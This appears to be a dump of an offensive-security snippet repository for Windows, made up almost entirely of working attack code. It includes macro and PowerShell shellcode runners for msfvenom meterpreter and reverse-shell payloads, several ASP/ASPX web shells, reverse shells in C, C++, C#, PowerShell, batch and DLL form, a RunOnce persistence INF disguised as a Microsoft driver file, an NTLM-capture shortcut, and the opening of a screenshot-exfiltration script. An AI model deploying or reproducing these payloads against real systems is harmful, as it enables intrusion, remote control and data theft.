| [InternetShortcut] 2 | URL=file:///c:\windows\system32\calc.exe 3 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.wsf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 13 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.inf: -------------------------------------------------------------------------------- 1 | ; DRIVER.INF 2 | ; Copyright (c) Microsoft Corporation. All rights reserved. 3 | 4 | [Version] 5 | Signature = "$CHICAGO$" 6 | Class=61883 7 | ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} 8 | Provider=%Msft% 9 | DriverVer=06/21/2006,6.1.7600.16385 10 | 11 | [DestinationDirs] 12 | DefaultDestDir = 1 13 | 14 | [DefaultInstall] 15 | AddReg = CalcStart 16 | 17 | [CalcStart] 18 | HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 12 | 13 | 14 | 19 | 20 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-msxml.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | 13 | 14 | 15 | iex notepad.exe 16 | 17 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-msxml.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 12 | 15 | 16 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/ntlm-1.url: -------------------------------------------------------------------------------- 1 | [InternetShortcut] 2 | URL=https://10.0.0.1 3 | IconIndex=0 4 | IconFile=\\10.0.0.1\test.ico 5 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/ntlm-evasion-mssql-1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Threading.Tasks; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | 6 | 7 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f csharp 8 | 9 | 10 | namespace ConsoleApp { 11 | 12 | class Program { 13 | 14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 15 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 18 | [DllImport("kernel32.dll")] 19 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 20 | 21 | static void Main(string[] args) 22 | { 23 | byte[] buf = new byte[460] { 24 | 0xfc,0x48,[...],0xff,0xd5 25 | }; 26 | int size = buf.Length; 27 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 28 | Marshal.Copy(buf, 0, addr, size); 29 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 30 | WaitForSingleObject(hThread, 0xFFFFFFFF); 31 | } 32 | 33 | } 34 | 35 | } 36 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.ps1: -------------------------------------------------------------------------------- 1 | # msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f ps1 2 | 3 | $Kernel32 = @" 4 | using System; 5 | using System.Runtime.InteropServices; 6 | public class Kernel32 { 7 | [DllImport("kernel32")] 8 | public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 9 | [DllImport("kernel32", CharSet=CharSet.Ansi)] 10 | public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 11 | [DllImport("kernel32.dll", SetLastError=true)] 12 | public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 13 | } 14 | "@ 15 | 16 | Add-Type $Kernel32 17 | 18 | [Byte[]] $buf = [Byte[]] $buf = 0xfc,0xe8,[...],0xff,0xd5; 19 | $size = $buf.Length; 20 | 21 | [IntPtr]$addr = [Kernel32]::VirtualAlloc(0, $size, 0x3000, 0x40); 22 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size); 23 | $thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0); 24 | [Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF") 25 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.vba: -------------------------------------------------------------------------------- 1 | ' msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f vbapplication 2 | ' run post/windows/manage/migrate 3 | 4 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _ 5 | ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 6 | 7 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _ 8 | ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr 9 | 10 | Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _ 11 | ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr 12 | 13 | Sub Document_Open() 14 | Init 15 | End Sub 16 | 17 | Sub AutoOpen() 18 | Init 19 | End Sub 20 | 21 | Sub Init() 22 | 23 | Dim buf As Variant 24 | Dim addr As LongPtr 25 | Dim counter As Long 26 | Dim data As Long 27 | Dim res As Long 28 | 29 | buf = Array( _ 30 | 232,143,[...],255,213 _ 31 | ) 32 | 33 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 34 | 35 | For counter = LBound(buf) To UBound(buf) 36 | data = buf(counter) 37 | res = RtlMoveMemory(addr + counter, data, 1) 38 | Next counter 39 | 40 | res = CreateThread(0, 0, addr, 0, 0, 0) 41 | 42 | End Sub 43 | 44 | -------------------------------------------------------------------------------- /snippets/windows/shells/bind/PortListener.ps1: -------------------------------------------------------------------------------- 1 | $endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, VAR_TARGET_PORT) 2 | $listener = New-Object System.Net.Sockets.TcpListener $endpoint 3 | $listener.Start() 4 | do { 5 | $client = $listener.AcceptTcpClient() 6 | $stream = $client.GetStream(); 7 | $reader = New-Object System.IO.StreamReader $stream 8 | do { 9 | $line = $reader.ReadLine() 10 | Write-Host $line -fore cyan 11 | } while ($line -and $line -ne ([char]4)) 12 | $reader.Dispose() 13 | $stream.Dispose() 14 | $client.Dispose() 15 | } while ($line -ne ([char]4)) 16 | $listener.Stop() -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Function RunCmd(command) 3 | Dim res as integer 4 | Dim myProcess As New Process() 5 | Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe") 6 | myProcessStartInfo.UseShellExecute = false 7 | myProcessStartInfo.RedirectStandardOutput = true 8 | myProcess.StartInfo = myProcessStartInfo 9 | myProcessStartInfo.Arguments="/c " + command 10 | myProcess.Start() 11 | Dim myStreamReader As StreamReader = myProcess.StandardOutput 12 | Dim myString As String = myStreamReader.Readtoend() 13 | myProcess.Close() 14 | RunCmd= MyString 15 | End Function 16 | %> 17 | Enter your shell command 18 | 19 | <% 20 | if request("cmd") "" then 21 | response.write(" 22 | 

"+ RunCmd(request("cmd"))+ "
23 | ") 24 | end if 25 | %> -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web2.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Server.ScriptTimeout = 180 3 | 4 | ip=request.ServerVariables("REMOTE_ADDR") 5 | if ip <> "VAR_ATTACKER_HOST" then 6 | response.Status="404 Page Not Found" 7 | response.Write(response.Status) 8 | response.End 9 | end if 10 | 11 | if Request.Form("submit") <> "" then 12 | Dim wshell, intReturn, strPResult 13 | cmd = Request.Form("cmd") 14 | Response.Write ("Running command: " & cmd & "
") 15 | set wshell = CreateObject("WScript.Shell") 16 | Set objCmd = wShell.Exec(cmd) 17 | strPResult = objCmd.StdOut.Readall() 18 | 19 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 20 | 21 | set wshell = nothing 22 | end if 23 | 24 | %> 25 | 26 | 27 | 28 |
29 | Command:
30 | 31 |

Example command to do a directory listing:
32 | %ComSpec% /c dir 33 |

34 | 35 | 36 | -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web3.asp: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo 6 | ' Release: 2000-12-01 7 | ' OS: Windows 2000, 4.0 NT 8 | ' ------------------------------------------- 9 | 10 | Dim oScript 11 | Dim oScriptNet 12 | Dim oFileSys, oFile 13 | Dim szCMD, szTempFile 14 | 15 | On Error Resume Next 16 | 17 | ' -- create the COM objects that we will be using -- ' 18 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 19 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 20 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 21 | 22 | ' -- check for a command that we have posted -- ' 23 | szCMD = Request.Form(".CMD") 24 | If (szCMD <> "") Then 25 | 26 | ' -- Use a poor man's pipe ... a temp file -- ' 27 | szTempFile = "C:\" & oFileSys.GetTempName( ) 28 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 29 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 30 | 31 | End If 32 | 33 | %> 34 | 35 | 36 |
" method="POST"> 37 | 38 | 39 |
40 | 
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 | 

43 | <%
44 |   If (IsObject(oFile)) Then
45 |     ' -- Read the output from our command and remove the temp file -- '
46 |     On Error Resume Next
47 |     Response.Write Server.HTMLEncode(oFile.ReadAll)
48 |     oFile.Close
49 |     Call oFileSys.DeleteFile(szTempFile, True)
50 |   End If
51 | %>
52 | 
53 | 
54 | 
55 | 
56 | 


--------------------------------------------------------------------------------
/snippets/windows/shells/bind/web4.aspx:
--------------------------------------------------------------------------------
 1 | <%@ Page Language="C#" Debug="true" Trace="false" %>
 2 | <%@ Import Namespace="System.Diagnostics" %>
 3 | <%@ Import Namespace="System.IO" %>
 4 | 
33 | 
34 | 
35 | Coffeeshop!
36 | 
37 | 
38 | 

39 |     
40 |     
41 | 

42 | 
43 | 
44 | 
45 | 
46 | 


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse1.bat:
--------------------------------------------------------------------------------
 1 | echo #include ^ >> shell.c
 2 | echo #include ^ >> shell.c
 3 | echo #pragma comment(lib, "w2_32") >> shell.c
 4 | echo WSADATA wsaData; >> shell.c
 5 | echo SOCKET Winsock; >> shell.c
 6 | echo SOCKET Sock; >> shell.c
 7 | echo struct sockaddr_in hax; >> shell.c
 8 | echo char aip_addr[16]; >> shell.c
 9 | echo STARTUPINFO ini_processo; >> shell.c
10 | echo PROCESS_INFORMATION processo_info; >> shell.c
11 | echo int main(int argc, char *argv[]) >> shell.c
12 | echo { >> shell.c
13 | echo    WSAStartup(MAKEWORD(2,2), ^&wsaData); >> shell.c
14 | echo    Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); >> shell.c
15 | echo        if (argv[1] == NULL){ >> shell.c
16 | echo        exit(1); >> shell.c
17 | echo    } >> shell.c
18 | echo        struct hostent *host; >> shell.c
19 | echo    host = gethostbyname(argv[1]); >> shell.c
20 | echo    strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); >> shell.c
21 | echo    hax.sin_family = AF_INET; >> shell.c
22 | echo    hax.sin_port = htons(atoi(argv[2])); >> shell.c
23 | echo    hax.sin_addr.s_addr =inet_addr(aip_addr); >> shell.c
24 | echo    WSAConnect(Winsock,(SOCKADDR*)^&hax, sizeof(hax),NULL,NULL,NULL,NULL); >> shell.c
25 | echo    if (WSAGetLastError() == 0) { >> shell.c
26 | echo        memset(^&ini_processo, 0, sizeof(ini_processo)); >> shell.c
27 | echo        ini_processo.cb=sizeof(ini_processo); >> shell.c
28 | echo        ini_processo.dwFlags=STARTF_USESTDHANDLES; >> shell.c
29 | echo        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; >> shell.c
30 | echo        char *myArray[4] = { "cm", "d.e", "x", "e" }; >> shell.c
31 | echo        char command[8] = ""; >> shell.c
32 | echo        snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]); >> shell.c
33 | echo        CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, ^&ini_processo, ^&processo_info); >> shell.c
34 | echo        exit(0); >> shell.c
35 | echo    } else { >> shell.c
36 | echo        exit(0); >> shell.c
37 | echo    } >> shell.c
38 | echo } >> shell.c


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse1.cpp:
--------------------------------------------------------------------------------
 1 | // Source: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp
 2 | // Compile with g++/i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
 3 | #include 
 4 | #include 
 5 | #include 
 6 | #pragma comment(lib, "Ws2_32.lib")
 7 | #define DEFAULT_BUFLEN 1024
 8 | 
 9 | void RunShell(char* C2Server, int C2Port) {
10 |     while(true) {
11 |         Sleep(5000);
12 |         SOCKET mySocket;
13 |         sockaddr_in addr;
14 |         WSADATA version;
15 |         WSAStartup(MAKEWORD(2,2), &version);
16 |         mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
17 |         addr.sin_family = AF_INET;
18 |         addr.sin_addr.s_addr = inet_addr(C2Server);
19 |         addr.sin_port = htons(C2Port);
20 |         if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
21 |             closesocket(mySocket);
22 |             WSACleanup();
23 |             continue;
24 |         }
25 |         else {
26 |             char RecvData[DEFAULT_BUFLEN];
27 |             memset(RecvData, 0, sizeof(RecvData));
28 |             int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
29 |             if (RecvCode <= 0) {
30 |                 closesocket(mySocket);
31 |                 WSACleanup();
32 |                 continue;
33 |             }
34 |             else {
35 |                 char Process[] = "cmd.exe";
36 |                 STARTUPINFO sinfo;
37 |                 PROCESS_INFORMATION pinfo;
38 |                 memset(&sinfo, 0, sizeof(sinfo));
39 |                 sinfo.cb = sizeof(sinfo);
40 |                 sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
41 |                 sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
42 |                 CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
43 |                 WaitForSingleObject(pinfo.hProcess, INFINITE);
44 |                 CloseHandle(pinfo.hProcess);
45 |                 CloseHandle(pinfo.hThread);
46 | 
47 |                 memset(RecvData, 0, sizeof(RecvData));
48 |                 int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
49 |                 if (RecvCode <= 0) {
50 |                     closesocket(mySocket);
51 |                     WSACleanup();
52 |                     continue;
53 |                 }
54 |                 if (strcmp(RecvData, "exit\n") == 0) {
55 |                     exit(0);
56 |                 }
57 |             }
58 |         }
59 |     }
60 | }
61 | int main(int argc, char **argv) {
62 |     FreeConsole();
63 |     if (argc == 3) {
64 |         int port  = atoi(argv[2]);
65 |         RunShell(argv[1], port);
66 |     }
67 |     else {
68 |         char host[] = "VAR_ATTACKER_HOST";
69 |         int port = VAR_ATTACKER_PORT;
70 |         RunShell(host, port);
71 |     }
72 |     return 0;
73 | }


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse1.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Text;
 3 | using System.IO;
 4 | using System.Diagnostics;
 5 | using System.ComponentModel;
 6 | using System.Linq;
 7 | using System.Net;
 8 | using System.Net.Sockets;
 9 | 
10 | namespace ConnectBack
11 | {
12 |     public class Program
13 |     {
14 |         static StreamWriter streamWriter;
15 |         public static void Main(string[] args)
16 |         {
17 |             using(TcpClient client = new TcpClient("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT))
18 |             {
19 |                 using(Stream stream = client.GetStream())
20 |                 {
21 |                     using(StreamReader rdr = new StreamReader(stream))
22 |                     {
23 |                         streamWriter = new StreamWriter(stream);
24 |                         StringBuilder strInput = new StringBuilder();
25 |                         Process p = new Process();
26 |                         p.StartInfo.FileName = "cmd.exe";
27 |                         p.StartInfo.CreateNoWindow = true;
28 |                         p.StartInfo.UseShellExecute = false;
29 |                         p.StartInfo.RedirectStandardOutput = true;
30 |                         p.StartInfo.RedirectStandardInput = true;
31 |                         p.StartInfo.RedirectStandardError = true;
32 |                         p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
33 |                         p.Start();
34 |                         p.BeginOutputReadLine();
35 |                         while(true)
36 |                         {
37 |                             strInput.Append(rdr.ReadLine());
38 |                             //strInput.Append("\n");
39 |                             p.StandardInput.WriteLine(strInput);
40 |                             strInput.Remove(0, strInput.Length);
41 |                         }
42 |                     }
43 |                 }
44 |             }
45 |         }
46 |         private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
47 |         {
48 |             StringBuilder strOutput = new StringBuilder();
49 | 
50 |             if (!String.IsNullOrEmpty(outLine.Data))
51 |             {
52 |                 try
53 |                 {
54 |                     strOutput.Append(outLine.Data);
55 |                     streamWriter.WriteLine(strOutput);
56 |                     streamWriter.Flush();
57 |                 }
58 |                 catch (Exception err) { }
59 |             }
60 |         }
61 |     }
62 | }


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse1.ps1:
--------------------------------------------------------------------------------
 1 | function cleanup {
 2 | if ($client.Connected -eq $true) {$client.Close()}
 3 | if ($process.ExitCode -ne $null) {$process.Close()}
 4 | exit}
 5 | $address = 'VAR_ATTACKER_HOST'
 6 | $port = 'VAR_ATTACKER_PORT'
 7 | $client = New-Object system.net.sockets.tcpclient
 8 | $client.connect($address,$port)
 9 | $stream = $client.GetStream()
10 | $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
11 | $process = New-Object System.Diagnostics.Process
12 | $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
13 | $process.StartInfo.RedirectStandardInput = 1
14 | $process.StartInfo.RedirectStandardOutput = 1
15 | $process.StartInfo.UseShellExecute = 0
16 | $process.Start()
17 | $inputstream = $process.StandardInput
18 | $outputstream = $process.StandardOutput
19 | Start-Sleep 1
20 | $encoding = new-object System.Text.AsciiEncoding
21 | while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
22 | $stream.Write($encoding.GetBytes($out),0,$out.Length)
23 | $out = $null; $done = $false; $testing = 0;
24 | while (-not $done) {
25 | if ($client.Connected -ne $true) {cleanup}
26 | $pos = 0; $i = 1
27 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
28 | $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
29 | $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
30 | if ($pos -gt 0) {
31 | $string = $encoding.GetString($networkbuffer,0,$pos)
32 | $inputstream.write($string)
33 | start-sleep 1
34 | if ($process.ExitCode -ne $null) {cleanup}
35 | else {
36 | $out = $encoding.GetString($outputstream.Read())
37 | while($outputstream.Peek() -ne -1){
38 | $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
39 | $stream.Write($encoding.GetBytes($out),0,$out.length)
40 | $out = $null
41 | $string = $null}} else {cleanup}}


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse2.cpp:
--------------------------------------------------------------------------------
 1 | // Modified
 2 | // Original: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp
 3 | // i686-w64-mingw32-g++ reverse2.cpp -o reverse2.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
 4 | 
 5 | #include 
 6 | #include 
 7 | #include 
 8 | #include 
 9 | #include 
10 | #pragma comment(lib, "Ws2_32.lib")
11 | #define DEFAULT_BUFLEN 1024
12 | 
13 | 
14 | void LaunchFreddy(char* place, int shipment) {
15 |     while(true) {
16 |         Sleep(5555);
17 | 
18 |         SOCKET myShipment;
19 |         sockaddr_in addr;
20 |         WSADATA version;
21 |         WSAStartup(MAKEWORD(2,2), &version);
22 |         myShipment = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
23 |         addr.sin_family = AF_INET;
24 |         addr.sin_addr.s_addr = inet_addr(place);
25 |         addr.sin_port = htons(shipment);
26 | 
27 |         if (WSAConnect(myShipment, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
28 |             closesocket(myShipment);
29 |             WSACleanup();
30 |             continue;
31 |         }
32 |         else {
33 |             char incomingPleasures[DEFAULT_BUFLEN];
34 |             memset(incomingPleasures, 0, sizeof(incomingPleasures));
35 |             int RecvCode = recv(myShipment, incomingPleasures, DEFAULT_BUFLEN, 0);
36 |             if (RecvCode <= 0) {
37 |                 closesocket(myShipment);
38 |                 WSACleanup();
39 |                 continue;
40 |             }
41 |             else {
42 |                 LPTSTR szCMDPath = new TCHAR[255];
43 |                 GetEnvironmentVariable((LPCSTR)"COMSPEC", szCMDPath, 256);
44 |                 STARTUPINFO sinfo;
45 |                 PROCESS_INFORMATION pinfo;
46 |                 memset(&sinfo, 0, sizeof(sinfo));
47 |                 sinfo.cb = sizeof(sinfo);
48 |                 sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
49 |                 sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) myShipment;
50 |                 CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
51 |                 WaitForSingleObject(pinfo.hProcess, INFINITE);
52 |                 CloseHandle(pinfo.hProcess);
53 |                 CloseHandle(pinfo.hThread);
54 |                 memset(incomingPleasures, 0, sizeof(incomingPleasures));
55 |                 int RecvCode = recv(myShipment, incomingPleasures, DEFAULT_BUFLEN, 0);
56 |                 if (RecvCode <= 0) {
57 |                     closesocket(myShipment);
58 |                     WSACleanup();
59 |                     continue;
60 |                 }
61 |                 if (strcmp(incomingPleasures, "exit\n") == 0) {
62 |                     exit(0);
63 |                 }
64 |             }
65 |         }
66 |     }
67 | }
68 | 
69 | 
70 | int main(int argc, char **argv) {
71 |     FreeConsole();
72 |     if (argc == 3) {
73 |         int port  = atoi(argv[2]);
74 |         LaunchFreddy(argv[1], port);
75 |     }
76 |     else {
77 |         char host[] = "VAR_ATTACKER_HOST";
78 |         int port = VAR_ATTACKER_PORT;
79 |         LaunchFreddy(host, port);
80 |     }
81 |     return 0;
82 | }
83 | 


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse2.ps1:
--------------------------------------------------------------------------------
1 | $client = New-Object System.Net.Sockets.TCPClient("VAR_TARGET_HOST",VAR_TARGET_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


--------------------------------------------------------------------------------
/snippets/windows/shells/reverse/reverse_dll.c:
--------------------------------------------------------------------------------
 1 | // gcc -shared -lws2_32 -o dll_rev_shell.dll dll_rev_shell.c
 2 | // rundll32 rev.dll,main
 3 | //#include "pch.h"
 4 | #include "stdlib.h"
 5 | #define _WINSOCK_DEPRECATED_NO_WARNINGS
 6 | #include 
 7 | #include 
 8 | #pragma comment(lib,"ws2_32")
 9 | 
10 | //using namespace std;
11 | WSADATA wsaData;
12 | SOCKET s1;
13 | struct sockaddr_in hax;
14 | char ip_addr[16];
15 | STARTUPINFO sui;
16 | PROCESS_INFORMATION pi;
17 | void executepayload(void)
18 | {
19 | WSAStartup(MAKEWORD(2, 2), &wsaData);
20 | s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
21 | 
22 | hax.sin_family = AF_INET;
23 | hax.sin_port = htons(VAR_ATTACKER_PORT);
24 | hax.sin_addr.s_addr = inet_addr("VAR_ATTACKER_HOST");
25 | 
26 | WSAConnect(s1, (SOCKADDR*)& hax, sizeof(hax), NULL, NULL, NULL, NULL);
27 | 
28 | memset(&sui, 0, sizeof(sui));
29 | sui.cb = sizeof(sui);
30 | sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
31 | sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1;
32 | 
33 | TCHAR commandLine[256] = "cmd.exe";
34 | CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi); // EDR Prevention using api hooking
35 | }
36 | BOOL APIENTRY DllMain(HMODULE hModule,
37 | DWORD  ul_reason_for_call,
38 | LPVOID lpReserved
39 | )
40 | {
41 | switch (ul_reason_for_call)
42 | {
43 | 
44 | case DLL_PROCESS_ATTACH:
45 |     executepayload();
46 | case DLL_THREAD_ATTACH:
47 | case DLL_THREAD_DETACH:
48 | case DLL_PROCESS_DETACH:
49 |     break;
50 | }
51 | return TRUE;
52 | }


--------------------------------------------------------------------------------
/snippets/windows/utils/Enable-Privilege.ps1:
--------------------------------------------------------------------------------
 1 | function Enable-Privilege {
 2 | 
 3 |     param(
 4 |         $Privilege,
 5 |         $ProcessId = $pid,
 6 |         [Switch] $Disable
 7 |     )
 8 |  
 9 | $definition = @'
10 | using System;
11 | using System.Runtime.InteropServices;
12 | 
13 | public class AdjPriv
14 | {
15 | [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
16 | internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall, ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen);
17 | 
18 | [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)]
19 | internal static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok);
20 | 
21 | [DllImport("advapi32.dll", SetLastError = true)]
22 | internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid);
23 | 
24 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
25 | internal struct TokPriv1Luid
26 | {
27 | public int Count;
28 | public long Luid;
29 | public int Attr;
30 | }
31 | 
32 | internal const int SE_PRIVILEGE_ENABLED = 0x00000002;
33 | internal const int SE_PRIVILEGE_DISABLED = 0x00000000;
34 | internal const int TOKEN_QUERY = 0x00000008;
35 | internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020;
36 | 
37 | public static bool EnablePrivilege(long processHandle, string privilege, bool disable)
38 | {
39 | bool retVal;
40 | TokPriv1Luid tp;
41 | IntPtr hproc = new IntPtr(processHandle);
42 | IntPtr htok = IntPtr.Zero;
43 | retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok);
44 | tp.Count = 1;
45 | tp.Luid = 0;
46 | if(disable)
47 | {
48 | tp.Attr = SE_PRIVILEGE_DISABLED;
49 | } else {
50 | tp.Attr = SE_PRIVILEGE_ENABLED;
51 | }
52 | retVal = LookupPrivilegeValue(null, privilege, ref tp.Luid);
53 | retVal = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero);
54 | return retVal;
55 | }
56 | }
57 | '@
58 | 
59 |     $processHandle = (Get-Process -id $ProcessId).Handle;
60 |     $type = Add-Type $definition -PassThru;
61 |     $type[0]::EnablePrivilege($processHandle, $Privilege, $Disable);
62 | }
63 | 


--------------------------------------------------------------------------------
/snippets/windows/utils/GrabAndRun.ps1:
--------------------------------------------------------------------------------
 1 | # ░▒▓ GrabAndRun.ps1 ▓▒░
 2 | #
 3 | # Takes screenshot, grabs some local information, encrypts using X.509 public key and sends everything over HTTP
 4 | 
 5 | Add-Type -AssemblyName System.Windows.Forms,System.Drawing
